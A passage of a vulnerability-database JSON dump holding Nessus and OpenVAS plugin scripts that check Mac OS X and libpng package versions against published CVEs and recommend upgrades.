\"CVE-2016-1732\",\n \"CVE-2016-1733\",\n \"CVE-2016-1734\",\n \"CVE-2016-1735\",\n \"CVE-2016-1736\",\n \"CVE-2016-1737\",\n \"CVE-2016-1738\",\n \"CVE-2016-1740\",\n \"CVE-2016-1741\",\n \"CVE-2016-1743\",\n \"CVE-2016-1744\",\n \"CVE-2016-1745\",\n \"CVE-2016-1746\",\n \"CVE-2016-1747\",\n \"CVE-2016-1748\",\n \"CVE-2016-1749\",\n \"CVE-2016-1750\",\n \"CVE-2016-1752\",\n \"CVE-2016-1753\",\n \"CVE-2016-1754\",\n \"CVE-2016-1755\",\n \"CVE-2016-1756\",\n \"CVE-2016-1757\",\n \"CVE-2016-1758\",\n \"CVE-2016-1759\",\n \"CVE-2016-1761\",\n \"CVE-2016-1762\",\n \"CVE-2016-1764\",\n \"CVE-2016-1767\",\n \"CVE-2016-1768\",\n \"CVE-2016-1769\",\n \"CVE-2016-1770\",\n \"CVE-2016-1773\",\n \"CVE-2016-1775\",\n \"CVE-2016-1788\",\n \"CVE-2016-1950\"\n );\n script_bugtraq_id(\n 71820,\n 71994,\n 75570,\n 77390,\n 77568,\n 77681,\n 78624,\n 78626,\n 79507,\n 79509,\n 79536,\n 79562,\n 80438,\n 80695,\n 80698\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-03-21-5\");\n\n script_name(english:\"Mac OS X 10.11.x < 10.11.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.11.x prior\nto 10.11.4. It is, therefore, affected by multiple vulnerabilities in\nthe following components :\n\n - apache_mod_php\n - AppleRAID\n - AppleUSBNetworking\n - Bluetooth\n - Carbon\n - dyld\n - FontParser\n - HTTPProtocol\n - Intel Graphics Driver\n - IOFireWireFamily\n - IOGraphics\n - IOHIDFamily\n - IOUSBFamily\n - Kernel\n - libxml2\n - Messages\n - NVIDIA Graphics Drivers\n - OpenSSH\n - OpenSSL\n - Python\n - QuickTime\n - Reminders\n - Ruby\n - Security\n - Tcl\n - TrueTypeScaler\n - Wi-Fi\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT206167\");\n # http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6c87f79a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X version 10.11.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os)\n audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70)\n exit(1, \"Cannot determine the host's OS with sufficient confidence.\");\n}\nif (!os)\n audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\n\nif (\n version !~ \"^10\\.11([^0-9]|$)\"\n) audit(AUDIT_OS_NOT, \"Mac OS X 10.11 or later\", \"Mac OS X \"+version);\n\nfix = \"10.11.4\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n items = make_array(\"Installed version\", version,\n \"Fixed version\", fix\n );\n order = make_list(\"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n exit(0);\n\n }\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"Mac OS X\", version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-29T13:45:49", "references": ["http://www.libpng.org/pub/png/src/libpng-1.6.15-README.txt", "https://security.gentoo.org/glsa/201502-10"], "pluginID": "81368", "description": "The remote host is affected by the vulnerability described in GLSA-201502-10 (libpng: User-assisted execution of arbitrary code)\n\n Two vulnerabilities have been discovered in libpng:\n The png_user_version_check function contains an out-of-bounds memory access error (libpng 1.6.15 Release Notes) The png_combine_row function contains an integer overflow error, which could result in a heap-based buffer overflow (CVE-2014-9495) Impact :\n\n A context-dependent attacker could entice a user to open a specially crafted PNG file using an application linked against libpng, possibly resulting in execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "edition": 4, "reporter": "Tenable", "published": "2015-02-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "nessus", "title": "GLSA-201502-10 : libpng: User-assisted execution of arbitrary code", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9495"], "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libpng"], "modified": "2017-01-13T00:00:00", "id": "GENTOO_GLSA-201502-10.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201502-10.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81368);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2017/01/13 14:56:00 $\");\n\n script_cve_id(\"CVE-2014-9495\");\n script_bugtraq_id(71820);\n script_xref(name:\"GLSA\", value:\"201502-10\");\n\n script_name(english:\"GLSA-201502-10 : libpng: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201502-10\n(libpng: User-assisted execution of arbitrary code)\n\n Two vulnerabilities have been discovered in libpng:\n The png_user_version_check function contains an out-of-bounds memory\n access error (libpng 1.6.15 Release Notes)\n The png_combine_row function contains an integer overflow error,\n which could result in a heap-based buffer overflow (CVE-2014-9495)\n \nImpact :\n\n A context-dependent attacker could entice a user to open a specially\n crafted PNG file using an application linked against libpng, possibly\n resulting in execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.libpng.org/pub/png/src/libpng-1.6.15-README.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201502-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libpng 1.6 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libpng-1.6.16'\n All libpng 1.5 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/libpng-1.5.21'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/libpng\", unaffected:make_list(\"ge 1.6.16\", \"ge 1.5.21\", \"ge 1.2.52\"), vulnerable:make_list(\"lt 1.6.16\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-02T08:27:44", "references": ["http://advisories.mageia.org/MGASA-2014-0131.html", "http://advisories.mageia.org/MGASA-2015-0008.html"], "pluginID": "82343", "description": "Updated libpng package fixes security vulnerabilities :\n\nThe png_push_read_chunk function in pngpread.c in the progressive decoder in libpng 1.6.x through 1.6.9 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an IDAT chunk with a length of zero (CVE-2014-0333).\n\nlibpng versions 1.6.9 through 1.6.15 have an integer-overflow vulnerability in png_combine_row() when decoding very wide interlaced images, which can allow an attacker to overwrite an arbitrary amount of memory with arbitrary (attacker-controlled) data (CVE-2014-9495).", "edition": 3, "reporter": "Tenable", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : libpng (MDVSA-2015:090)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0333", "CVE-2014-9495"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64png16_16", "cpe:/o:mandriva:business_server:2", "p-cpe:/a:mandriva:linux:lib64png-devel"], "id": "MANDRIVA_MDVSA-2015-090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82343", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:090. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82343);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/19 20:59:19\");\n\n script_cve_id(\"CVE-2014-0333\", \"CVE-2014-9495\");\n script_xref(name:\"MDVSA\", value:\"2015:090\");\n\n script_name(english:\"Mandriva Linux Security Advisory : libpng (MDVSA-2015:090)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated libpng package fixes security vulnerabilities :\n\nThe png_push_read_chunk function in pngpread.c in the progressive\ndecoder in libpng 1.6.x through 1.6.9 allows remote attackers to cause\na denial of service (infinite loop and CPU consumption) via an IDAT\nchunk with a length of zero (CVE-2014-0333).\n\nlibpng versions 1.6.9 through 1.6.15 have an integer-overflow\nvulnerability in png_combine_row() when decoding very wide interlaced\nimages, which can allow an attacker to overwrite an arbitrary amount\nof memory with arbitrary (attacker-controlled) data (CVE-2014-9495).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0131.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0008.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lib64png-devel and / or lib64png16_16 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png16_16\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64png-devel-1.6.16-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64png16_16-1.6.16-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-25T10:53:45", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151116.html", "2015-2765"], "pluginID": "1361412562310869517", "description": "Check the version of libpng10", "edition": 2, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-07-07T00:00:00", "title": "Fedora Update for libpng10 FEDORA-2015-2765", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869517", "id": "OPENVAS:1361412562310869517", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libpng10 FEDORA-2015-2765\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869517\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:21:27 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libpng10 FEDORA-2015-2765\");\n script_tag(name: \"summary\", value: \"Check the version of libpng10\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The libpng10 package contains an old version of libpng, a library of functions\nfor creating and manipulating PNG (Portable Network Graphics) image format\nfiles.\n\nThis package is needed if you want to run binaries that were linked dynamically\nwith libpng 1.0.x.\n\");\n script_tag(name: \"affected\", value: \"libpng10 on Fedora 22\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-2765\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151116.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpng10\", rpm:\"libpng10~1.0.63~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:15:33", "references": ["2015:0092_1"], "pluginID": "1361412562310850886", "description": "Check the version of libpng16", "edition": 5, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-10-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "SuSE Update for libpng16 SUSE-SU-2015:0092-1 (libpng16)", "type": "openvas", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "modified": "2017-12-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850886", "id": "OPENVAS:1361412562310850886", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0092_1.nasl 8046 2017-12-08 08:48:56Z santu $\n#\n# SuSE Update for libpng16 SUSE-SU-2015:0092-1 (libpng16)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850886\");\n script_version(\"$Revision: 8046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:48:56 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:35:19 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for libpng16 SUSE-SU-2015:0092-1 (libpng16)\");\n script_tag(name: \"summary\", value: \"Check the version of libpng16\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"\n This update fixes the following security issues:\n\n * CVE-2014-9495: libpng versions heap overflow vulnerability, that under\n certain circumstances could be exploit. [bnc#912076]\n\n * CVE-2015-0973: A heap-based overflow was found in the\n png_combine_row() function of the libpng library, when very large\n interlaced images were used.[bnc#912929]\");\n script_tag(name: \"affected\", value: \"libpng16 on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"SUSE-SU\", value: \"2015:0092_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpng16-16\", rpm:\"libpng16-16~1.6.8~5.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-32bit\", rpm:\"libpng16-16-32bit~1.6.8~5.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-debuginfo\", rpm:\"libpng16-16-debuginfo~1.6.8~5.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-debuginfo-32bit\", rpm:\"libpng16-16-debuginfo-32bit~1.6.8~5.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-debugsource\", rpm:\"libpng16-debugsource~1.6.8~5.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpng16-16\", rpm:\"libpng16-16~1.6.8~5.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-debuginfo\", rpm:\"libpng16-16-debuginfo~1.6.8~5.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-debugsource\", rpm:\"libpng16-debugsource~1.6.8~5.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-32bit\", rpm:\"libpng16-16-32bit~1.6.8~5.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpng16-16-debuginfo-32bit\", rpm:\"libpng16-16-debuginfo-32bit~1.6.8~5.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:16:27", "references": ["2015:0161_1"], "pluginID": "1361412562310850631", "description": "Check the version of libpng16", "edition": 3, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-01-29T00:00:00", "title": "SuSE Update for libpng16 openSUSE-SU-2015:0161-1 (libpng16)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0973", "CVE-2014-9495"], "modified": "2017-12-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850631", "id": "OPENVAS:1361412562310850631", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0161_1.nasl 8046 2017-12-08 08:48:56Z santu $\n#\n# SuSE Update for libpng16 openSUSE-SU-2015:0161-1 (libpng16)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850631\");\n script_version(\"$Revision: 8046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:48:56 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-29 05:13:05 +0100 (Thu, 29 Jan 2015)\");\n script_cve_id(\"CVE-2014-9495\", \"CVE-2015-0973\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for libpng16 openSUSE-SU-2015:0161-1 (libpng16)\");\n script_tag(name: \"summary\", value: \"Check the version of libpng16\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"\n libpng was updated to fix some security issues:\n\n * CVE-2014-9495 [bnc#912076]: Heap-buffer overflow png_combine_row() with\n very wide interlaced images\n\n * CVE-2015-0973 [bnc#912929]: overflow in png_read_IDAT_data\n\n libpng is now also build with -DPNG_SAFE_LIMITS_SUPPORTED.\");\n script_tag(name: \"affected\", value: \"libpng16 on openSUSE 13.1\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"openSUSE-SU\", value: \"2015:0161_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 